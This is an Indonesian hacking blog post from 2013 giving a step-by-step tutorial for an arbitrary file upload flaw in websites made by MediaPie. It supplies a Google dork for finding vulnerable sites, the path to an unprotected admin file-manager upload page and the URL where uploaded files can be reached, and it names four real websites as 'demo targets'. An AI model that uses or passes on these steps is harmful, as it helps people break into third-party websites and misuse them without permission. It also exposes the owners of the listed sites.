05/11/13

0 Arbitrary File Upload On MediaApie

Posting By : Red zone cyber
Okay tanpa basa basi, langsung aja ke tutorialnya :D

#Dork : intitle:"intext:Website by MediaPie"

#POC :

Jika sudah menemukan target dengan dork tadi, pakai exploit diatas, sehingga menjadi :

www.target.com/admin/ajaxfilemanager/ajaxfilemanager/ajaxfilemanager.php

1. Jika sudah, kalian klik "Upload"
2. Jika sudah, pilih file .txt kalian ( karena hanya support txt saja )


3. Jika sukses, cara memanggil filenya yaitu :
http://site-target/admin_images/[YOURFILE]
Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua 

Demo Target :
http://theenglishcaravancompany.com/
http://myholidaymonkey.com/
http://creativecouriers.com/ 
http://edenlondon.com/devsite/

This Exploit not support php, html , png, gif

Okay, udah itu ajaa :D
sebelum mengakiri tutorial hari ini, saya ucapkan trimakasih buat temen saya :D

Sumber : http://newbie-security.or.id/

Semoga Bermanfaat
Copyright © 2013 Red ZoNe Cyber™

0 Comment To Blogger
Silahkan Berkomentar Dengan Baik.
Silahkan Tinggalkan Komentar Anda.

0 komentar:

Posting Komentar

-[ Silahkan Komentar Dengan Baik ]-

1. Berkomentarlah Sesuai topik pembicaraan.
2. Dilarang Membuat masalah/mengejek dengan komentator lain.
3. Dimohon untuk berkomentar dengan bahasa Indonesia yang baku dan sopan.

Langganan: Posting Komentar (Atom)
Blogger Tricks
 
Copyright © 2014 Red ZoNe Cyber ® is a Registered at Blogger. All Rights Reserved. | This site is under Creative by FLazer Network | Indonesia Design By FLazer_404 | Blogger Template By Main Google - Save Template